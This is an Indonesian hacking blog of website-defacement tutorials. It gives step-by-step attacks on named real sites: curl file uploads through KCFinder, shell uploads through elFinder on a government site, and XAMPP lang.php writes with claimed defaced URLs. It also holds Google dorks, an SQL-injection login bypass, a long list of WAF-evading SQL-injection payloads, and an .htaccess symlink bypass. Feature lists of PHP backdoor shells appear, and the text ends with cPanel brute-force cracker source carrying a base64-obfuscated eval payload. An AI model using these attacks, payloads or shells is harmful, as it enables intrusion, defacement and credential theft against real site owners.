Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.



  • Apa itu Kcfinder?
     KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.


  • Apa itu cURL?
    cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.


Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.

Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,

Bahan :
  • Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
  • Terminal / CMD 
Tested :
  • MAC OS X Yosemite
Step :
  1. Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
  2. lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
  3. Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.



Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v
Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.

Dork :

  • inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )
Exploit :
  • www.site.com/[path]/elfinder/elfinder.php.html
Live Target : http://labuankec.pandeglangkab.go.id/


Step :
  1. Dorking di google, pilih target dan kasih exploit satu satu
  2. dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html
  3. Langsung aja Upload Shell dengan ekstensi .phtml 
  4. lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml


Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.

nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3
Naufal Ardhani - Hallo gaes kali ini gua bakal bagiin ke-kalian Tutorial Dump Database CMS Balitbang dengan Mudah, Kenapa mudah? ya karna ini inject databasenya pake tools jadi gaperlu manual lagi hehe dan target web yang pake cms balitbang masih banyak yg bisa di inject.

Bahan yang diperlukan :

  • Tools ( KLIK INI )
  • Akses Shell ( untuk upload tools ini )
  • Google Dork ( inurl:/html/index.php site:sch.id )

Step :
  1. dorking target dulu.
  2. masukan url target yang sudah didapatkan.
  3. langsung klik inject ( dios sudah otomatis ada )
Jika berhasil akan muncul outputnya




Sekian Tutorial Dump Database CMS Balitbang dengan Mudah semoga bermanfaat yaaa.
Naufal Ardhani - Hallo gaes kali ini gua mau bagiin Tools Balitbang Auto SQL-Injection yang dibuat oleh Cy#b3r00t, Siapa itu Cy#b3r00t? Ia adalah Seorang Defacer & Coder yang Skillnya lumayan Hebat entah dari kapan dia mulai belajar ilmu ilmu seperti itu tapi ia juga seorang Leader dari Sora Cyber Team tim ini bukan tim ecek ecek ( jelek gitu :v ) karna membernya juga lumayan hebat hebat.



Nah langsung aja ke penjelasan Toolsnya, Tools Balitbang Auto SQL-Injection bisa digunakan untuk dump database Web Sekolah yang menggunakan CMS Balitbang Tidak semua bisa di inject tapi seenggaknya masih banyak yang bisa di inject dan tools ini sangat memudahkan para defacer karna cara pemakaianya hanya memasukan url dan dios.


Script :


Cara Pemakaian? Cek cek lagi di blog ini.



Thanks to : Cy#b3r00t - Sora Cyber Team - AnarchoXploit


Sumber : Channel Cy#b3r00t


Shell Backdoor EXPLOIT1337 - Kali ini saya membagikan Shell Backdoor milik Exploit1337 nih, gausah banyak basa basi langsung aja nih dibawah.


Fitur :

  • Upload 
  • Command 
  • Mass Tools 
  • Config 
  • Config V.2 
  • SymConfig 
  • Jumping 
  • CPanel Crack 
  • Symlink 
  • Symlink V.2 
  • Defacer.id
  •  Zone-H 
  • DB Dump 
  • Bypass vHost 
  • Auto Edit User 
  • Auto Deface WordPress 
  • Auto Edit Title WordPress 
  • SMTP Grabber 
  • Bypass Etc/Passw 
  • Csrf Exploiter 
  • CGI Telnet 
  • Fake Root 
  • Admin Finder 
  • NginDexer 
  • Adminer 
  • K-RDP Shell 
  • Domains Viewer 
  • Back Connect 
  • Back Connect V.2 
  • Disable Functions 
  • ZIP Menu




Screenshot :



Script :
  • Paste.co ( password : naufalardhani.com )





Tutorial Mencari Admin Login Page dengan Terminal berbasis CLI [ PHP ]
 - Halo abang-abang semuanyaa udah lama nih kaga update artikel, nah kali ini saya bakalan ngasih Tutorial Mencari Admin Login Page dengan Terminal berbasis CLI [ PHP ], pasti kalian suka kesel kan ga nemu admin loginya? padahal udah dapet username dan password web tersebut, biasanya sih ini dilakukan dengan teknik SQL Injection atau lain lain dan kebetulan sekali di wordlist admin finder ini ada 4001 kata pasti dengan trik ini bakal ke scan admin login pagenya :) banyak kan? ya iya dong hehe.

Tools By ./Mr.Cakil - 99Syndicate


Download Tools

Alat dan Bahan
  • Terminal ( yang sudah terinstall PHP )

Tested : Terminal Mac

Oke langsung aja tutorialnya,

  1. Buka Zipnya dan Ekstrak ke Desktop
  2. Buka Terminal
  3. Masuk ke Directory Desktop :> cd Desktop 
  4. Masuk ke Directory adfin :> cd adfin
  5. Jalankan Toolsnya :> php adfin.php
  6. Masukan site, ( anda masukan link web yang ingin di scan )

Tidak usah tunggu selesai proses scannya karna jika ditemukan langsung masuk ke result.txt

Silahkan cek result.txt :)

Sekian saja Artikel Tutorial Mencari Admin Login Page dengan Terminal berbasis CLI [ PHP ], tunggu artikel selanjutnya..


Macam-Macam Bypass SQLI dengan WAFF - Hello guys dah lama nih ga update artikel hehehe dan kali ini saya membagikan  Macam-Macam Bypass SQLI dengan WAFF,  pasti bagi kalian para Defacer sudah tidak asing lagi dengan POC SQL-Injection, yap POC ini bisa dibilang mudah/susah tergantung webnya, jika kamu sering mengalami error saat sedang meng-inject sqlnya tenang aja disini saya akan memberikan Macam-Macam Bypass SQLI dengan WAFF, dibawah yaaa.




WAFF

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table 

[~] concat() [~]

CoNcAt()
concat() 
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]

/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

Sekian artikel Macam-Macam Bypass SQLI dengan WAFF Terima Kasih telah mengunjungi blog saya :)
Naufal Ardhani - Kali in saya akan memberikan Tutorial Deface Xampp Local Write Access, POC ini sedang banyak dipakai oleh defacer defacer karna apa? ntah lah :v karna saya cuma liat show off defacer di grup grup yang ada dan apa keuntunganya? hemmm... keuntungannya ialah bisa mirror di Zone-H :)



Oke Langsung aja

-Dork

  • inurl:/security/lang.php
  • inurl:/xampp/lang.php
-Exploit
  • /xampp/lang.php?Hacked_By_E4OXY ( untuk dir xampp )
  • /security/lang.php?Hacked_By_E4OXY ( untuk dir security )
-Preview
  • /xampp/lang.tmp ( untuk dir xampp )
  • /security/lang.tmp ( untuk dir security )
-Step
  1. Dorking dulu, kalau saya menggunakan dork "inurl:/security/lang.php intext:xampp",Tutorial Deface Xampp Local Write Access
  2. Beri Exploitnya, contoh "/security/lang.php?Hacked_By_E4OXY" (karna disini saya pakai dork yang inurl:security/lang.php jadi exploitnya juga di dir security),
  3. Jika berhasil akan seperti gambar dibawah,
  4. Untuk Preview hasilnya tinggal beri "/security/lang.tmp", contoh http://vega-apache.ingeneo.co/security/lang.tmp
    Tutorial Deface Xampp Local Write Access
Hasil saya :
http://www.mp-mall.com.hk/security/lang.tmp
http://www.moghulisran.com/security/lang.tmp
http://www.altebagestion.net/security/lang.tmp
http://vega-apache.ingeneo.co/security/lang.tmp

SEKIAN WASSALAM :)
Naufal Ardhani - Hello heker-heker lokal yang berbahagia, di artikel ini saya akan memberikan Tutorial Deface POC Matrimonial Auth Bypass Admin Vulnerability . ada yang udah pernah mencoba POC ini? ya kalau udah.. boleh di baca lagi dan kalau belom ya silahkan dicoba bang.

[+] Demo   : www.teluguchristianmatrimony.com
[+] Dork     : "printprofile.php?id="
[+] U & P   : '=''or'

[+] Step

  • Dorking dulu webnya di google atau search engine lain
  • Lalu kasi /admin/ contoh www.site.com/admin/ | www.teluguchristianmatrimony.com/admin/
  • Jika sudah ter redirect ke page login admin masukan username dan password '=''or' seperti di gambar diatas
  • Kalau berhasil bypass, kalian akan masuk ke Admin Panel seperti gambar dibawah
  • Langsung aja ke Web Settings di Site Configuration, ganti semua deh dengan text Hacked by.... atau apalah :v
  • dan yang terubah hanya title web dll, tapi buat mirror + ngeshoof bisa lah :v untuk tebas index atau upload shell saya belom bisa untuk poc ini karena baru aja saya pelajari kalau sudah bisa upload shell atau jso segera saya upload tutorial selanjutnya


SEKIAN

Naufal Ardhani - Oke guys kali ini w bakal share NoName Shell Backdoor, pasti kalian sudah tau apa itu Shell Backdoor yaudah kalo dah tau :v Shell Backdoor ini dibuat oleh Team XaiSyndicate dan di bagikan secara gratis untuk para defacer indonesia fiturnya pun lumayan banyak, oke langsung aja di bawah tentang shellnya.


Screenshot :


Fitur :
  • Command
  • Upload
  • Mass Tools ( Mass Deface dan Mass Delete )
  • Config
  • Config V.2
  • SymConfig
  • Jumping
  • CPanel Crack
  • Symlink
  • Symlink V.2
  • Zone-H
  • Defacer.id
  • Bypass vHost
  • Auto Edit User
  • Auto Deface WordPress 
  • Wordpress Auto Deface V.2
  • Auto Edit Title WordPress 
  • Encode/Decoder
  • SMTP Grabber
  • VB Index Changer
  • Multi Config
  • DB Dump 
  • Inject Code
  • Bypass Etc/Passw
  • Dan masih banyak lagi bisa liat di screenshot

Link :
SEKIAN ARTIKEL NoName Shell Backdoor

Naufal Ardhani - Hello pren pren sekalian :v kali ini saya bakal share Cara Bypass Symlink dengan .htaccess .... hmm saya tau nih kalian liat artikel ini karna target deface kalian symlinknya error kan? :'v oke kalem aja karena saya ada solusinya wkwk, langsung aja dibawah yaa...


BAHAN : 

  • Script .htaccess
  • Shell ( saya sih pake shell noname xai / shell apa aja Yang Ada Symlinknya )
  • Target Web yang sudah tertanam shell dan ada symlink



Script .htaccess

OPTIONS  Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS  Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All




Step
  1. Buka Shell di web yang ada symlinknya ( terdapat gambar shell noname )
  2. Lalu Klik Symlink ( dan redirect ke page symlink ) 
  3. Pilih Salah satu web abis tu klik symlink di kanan domain 
  4. Jika error seperti itu jangan panik kalem aja :v 
  5. Silahkan edit script .htaccess dengan script yang diatas tadi di folder /sym/ dan kalau sudah edit di save
  6. sudah tidak error lagi kan? tapi yang digambar hanya ada cgi-bin/ :v cuma sekedar pembelajaran aja ya
  7. dan sudah berhasil :) terlihat Index of ....... 
  8. langsung kalian sikat aja confignya untuk tutorial lebih lanjut silahkan cek blog ini

Sekian Cara Bypass Symlink dengaan .htaccess




 Naufal Ardhani - Hallo babang, kali ini saya hanya membagikan script Cpanel Cracker by Pekalongan Blackhat, untuk tutorial crack cpanelnya silahkan cek di blog ini.

Screenshot :





Script :

<?php
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('display_errors', 0);
@ini_set('output_buffering',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
?>
<html>
<title>Cpanel Cracker by Pekalongan Blackhat</title>
<body>

<STYLE>textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 10px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 10px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20 }
body { font-family: Tahoma}
.x-inj { font-family: Vivaldi}
tr { BORDER: dashed 1px #333; color: #00ff; }
td { BORDER: dashed 1px #333; color: #00ff; }
.table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #00ff; }
.td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 8pt Verdana; color: #00ff00; }
.tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #00ff; }
table { BORDER: dashed 1px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: Black; color: #00ff; }
input { border: dashed 1px; border-color: #333; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: #00ff; }
select { BORDER-RIGHT:  Black 1px solid; BORDER-TOP:    #00ff 1px solid; BORDER-LEFT:   #00ff 1px solid; BORDER-BOTTOM: Black 1px solid; BORDER-color: #00ff; BACKGROUND-COLOR: Black; font: pt Verdana; color: #00ff; }
submit { BORDER:  buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #00ff; }
textarea { border: dashed 1px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; }
BODY { SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #00ff; SCROLLBAR-SHADOW-color: #00ff; SCROLLBAR-3DLIGHT-color: #00ff; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #00ff; SCROLLBAR-DARKSHADOW-color: #00ff margin: 1px; color: #00ff00; background-color: Black; }
.main { margin: -287px 0px 0px -490px; BORDER: dashed 1px #333; BORDER-COLOR: #333333; }
.tt { background-color: Black; }
A:link { COLOR: White; TEXT-DECORATION: none }
A:visited { COLOR: White; TEXT-DECORATION: none }
A:hover { color: #00ff00; TEXT-DECORATION: none }
A:active { color: #00ff00; TEXT-DECORATION: none }
</STYLE>


<?php
@ini_set('display_errors', 0);
@ini_set('output_buffering',0);
echo "<center>

<img src='http://www.yakult.co.th/spaw2/uploads/images/pro.PNG'><br>
<b><font color='#00ff00' class='x-inj' size='5'>Cpanel Cracker </font><br><br><br></b><b>
<font size='3'>
|| <a href='?do=uploader'>./Uploader</a> | <a href='?do=config'>./Config</a> | <a href='?do=bhconfig'>./B-F Config Cpanel</a> | <a href='?do=brute'>./Cpanel BruteForce</a> ||</b><br><br><br></center></font><br> ";

if(isset($_REQUEST['do'])){
switch ($_REQUEST['do']){
################php info
case 'bhconfig';
echo "<center/><br/><b><font color=#00ff00>+--==[ B-F Config ]==--+</font></b><br><br>";
  mkdir('bconfig', 0755);
    chdir('bconfig');
        $akses = ".htaccess";
        $buka_lah = "$akses";
        $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");
        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-php .cpc
";
        fwrite ( $buka , $metin ) ;
        fclose ($buka);
$confshell = 'PD9waHAgLyogfHwgSWRlYSA6OiBNci5BbHNhM2VrIHx8IFByb2dyYW1taW5nIDo6IEctQiB8fCBEZXNpZ25lciA6OiBBbC1Td2lzcmUgfHwgKi8kT09PMDAwMDAwPXVybGRlY29kZSgnJTY2JTY3JTM2JTczJTYyJTY1JTY4JTcwJTcyJTYxJTM0JTYzJTZmJTVmJTc0JTZlJTY0Jyk7JE9PTzAwMDBPMD0kT09PMDAwMDAwezR9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHszfS4kT09PMDAwMDAwezV9OyRPT08wMDAwTzAuPSRPT08wMDAwMDB7Mn0uJE9PTzAwMDAwMHsxMH0uJE9PTzAwMDAwMHsxM30uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDBPMC49JE9PTzAwMDBPMHszfS4kT09PMDAwMDAwezExfS4kT09PMDAwMDAwezEyfS4kT09PMDAwME8wezd9LiRPT08wMDAwMDB7NX07JE9PTzAwME8wMD0kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MTJ9LiRPT08wMDAwMDB7N30uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezE1fTskTzBPMDAwTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHsxfS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTR9OyRPME8wMDBPME89JE8wTzAwME8wMC4kT09PMDAwMDAwezExfTskTzBPMDAwTzAwPSRPME8wMDBPMDAuJE9PTzAwMDAwMHszfTskTzBPMDBPTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHs4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDAwTz0kT09PMDAwMDAwezN9LiRPT08wMDAwMDB7MTR9LiRPT08wMDAwMDB7OH0uJE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHs4fTskT09PME8wTzAwPV9fRklMRV9fOyRPTzAwTzAwMDA9MHgxMDdjO2V2YWwoJE9PTzAwMDBPMCgnSkU4d01EQlBNRTh3TUQwa1QwOVBNREF3VHpBd0tDUlBUMDh3VHpCUE1EQXNKM0ppSnlrN0pFOHdUekF3VDA4d01DZ2tUekF3TUU4d1R6QXdMREI0TkdNMEtUc2tUMDh3TUU4d01FOHdQU1JQVDA4d01EQXdUekFvSkU5UFR6QXdNREF3VHlna1R6QlBNREJQVHpBd0tDUlBNREF3VHpCUE1EQXNNSGd4TjJNcExDZEZiblJsY25sdmRYZHJhRkpJV1V0T1YwOVZWRUZoUW1KRFkwUmtSbVpIWjBscFNtcE1iRTF0VUhCUmNWTnpWblpZZUZwNk1ERXlNelExTmpjNE9Tc3ZQU2NzSjBGQ1EwUkZSa2RJU1VwTFRFMU9UMUJSVWxOVVZWWlhXRmxhWVdKalpHVm1aMmhwYW10c2JXNXZjSEZ5YzNSMWRuZDRlWG93TVRJek5EVTJOemc1S3k4bktTazdaWFpoYkNna1QwOHdNRTh3TUU4d0tUcz0nKSk7cmV0dXJuOz8+fkRrcjlOSGVuTkhlbk5IZTF6ZnVrZ0ZNYVhkb3lqY1VJbWIxOW9VQXh5YjE4bVJ0d213SjRMVDA5TkhyOFhUekVYUkp3bXdKWExUMDlOSGVFWEhyOFhodE9OVDA4WEhlRVhIcjhQa3I4WFR6RVhUMDhYSHRJTFR6RVhIcjhYVHpFWFJ0T05UekVYVHpFWEhlRXBSdGZ5ZG1PbEZtbHZmYmZxRHlrd0JBc0thMDlhYXJ5aVdNa2VDME9MT01jdWMwbHBVTXBIZHIxc0F1bk9GYVl6YW1jQ0d5cDZIZXJaSHpXMVlqRjRLVVN2TlVGU2sweXRXME95T0xmd1VBcFJUcjFLVDFuT0FsWUFhYWNiQnlsRENCa2pjb2FNYzJpcERNc1NkQjV2RnV5WkYzTzFmbWY0R2JQWEhUd3pZZUEyWXpJNWhaOG1oVUxwSzJjamRvOXpjVUlMVHpFWEhyOFhUekVYaFRzbGZNeVNodE9OVHpFWFR6RVhUekVwS1g9PXRtWWxmeTkwREIxbGIyeHBkQmwwaGVFcEtYcGxGbWt2Rmw5WmNibnZGbU9wZE1GUEh0TDd0TWxNaG9sekYyYTBodE9nQXI5VGF5U21mYmtTazEwcGhiU2hrdWFaZHRFOXd0T2dBcjlUYXlTbWZia1NrMTA3dG0xbGR1WWxHWFBMZmJrU3dlMElrMmkwZnVFNlJaOTNmM0ZWa3pTaGdXcGxDMml2d3RGOHdBT05XMU9jQXJBSVV5T1lUZTRoTm9pMGRCWCt0anhQY0J5TE5JUDhmb2wwZG9BK1dKMW93cll2ZE1jcGMxOWpBb3lWY0JYOFIzT3Bmb3hsTklQOEYzTzVkb0FJZnVsWGNUMEpmb2E0ZnQ5akYzSEpOSVBoQ005TEdiU2h3dEVJZEJ5WmMybFZ3ZVBJQ2JhMGR6U2h3dEVJQ015akQyZlpkM2FWY3QxamQyeHZGalBqY2pjTVlNQzJLWFBJd3RuamQyeHZGalBJd3pIektUTDVLVFNod3RFSWNNOVZmdDFNQ0IxcGR1TDZ3dU9pRG85c0NVWEljMmFWY2JjaVJ0blNmQllwY29yU2R1YWpEQk9pd29mWkNCNUxjVVhJQ2JrcENCWFN3b2lsZHVjbGZvbGpDVVhJRjJ5VkZaMXpjYmtwY2pTaHd0RUljTTlWZnQxTUNCMXBkdUw2d2VyMEZ1STd0SkVJd3VPbEd1V3NDQnhwYzI0NndvWWxkbU9sRmpTaHd0RUl3b2N2ZG1Xc2YyYXBjMmkwS0puSmQyeEx3ZVNoZ1dQaERCNVhmYldTZm9hNGZveVpjQnJTRjJhU2NCWTBHWHBNZDI1MFJiZmxEQmZQZmVQSUNNOVNjZVNoQzI5U2QzdzZ3dEhYSGVFWEhlRTd0TWt2Rk1PbEZqUElIYm40d3VZdmRvbEx3dFllVzBZZVcwSDd0TWtpQzJzbUZNOTFkTVdzQzI5U2QzdzZ3dWZQRGJPbEtYcFhDQk9MREI1bUtKRXpGdUk3dE1rdkZNT2xGSjFaQ0JPcGZiSDZ3ZWZYR2VTaGdXUGhEQjVYZmJXNmNNOWpmYlk3dElQSUNNOTRSYllQQ0JPdmZ6UElIdW40d2VuWEd0RTFGdUlJd3pFWEtBQzVPalNodG0waHcyY3ZkM09sRkpFSUdYUGhDMjlTZDN3Nnd0SFhIZUVYSGVFN3RNY3ZkbVdzY015c0RCeDVLSkV4WXVuNEtYcDBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSGVTaGNNOVZmdDEzY0JsbUR1VzZ3bzV2Rk0xaWRlU2hnV3BpR1hQSXd1T2xHdVdzY29hamQza2lmb2x2ZGpQSWRNOVZjVFNod3RuamQyeHZGalBqSHpIekh6SHpLWHA5dGpYdkYzTzVkb0ErdGpYdkRvYWljZTRoTm9rdmN1TCt0anhMRGJDSURCVzl3bU92ZDJYSk5JUDhVZXJJRjNPNWRvQTl3TVl2ZG85WktKRWpZZVcwWWVXMEtabjBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSHR3N2ZvYTRmdDFpZG9sbWRqUElDMmFWZm9hWkt6NXRSQUNJVzI5VmNNbG1iMllXQ0I1bGRlWHZVZXIrdGp4TWQza3N3bzFsZm9pdmNlMEpBcjlUYXR3K3RqeHBkbW4xZnRuVkNCMWxOVWsxRk1YSnd1TzVGb0E5d21PbEd1V0p3dWNpZHVhbE5Vd21SSk8xRk1YVmtad0lGMmw2Y1QwSlllRUp3dDgrdGp4cGRtbjFmdG4wR2JubE5Va3pmQmtzRGJXSnd1Y2lkdWFsTlVrVGZveVpmdEUrd0pFdk5JUDhSMmN2Rk0wK05va1p3dDgrTm9rWnd0OCtrelNoREJDUERiWXpjYldQa3k5V1QxWUFCWmYxRk1YbWJVTHBHWHBwY0pJaWNNbFNjYTltY2JPZ0MyOVZmb2FWZnVIUGt1YVpkdExwR1hwbEMyaXZ3dGZ5Rm1rdkZKNElV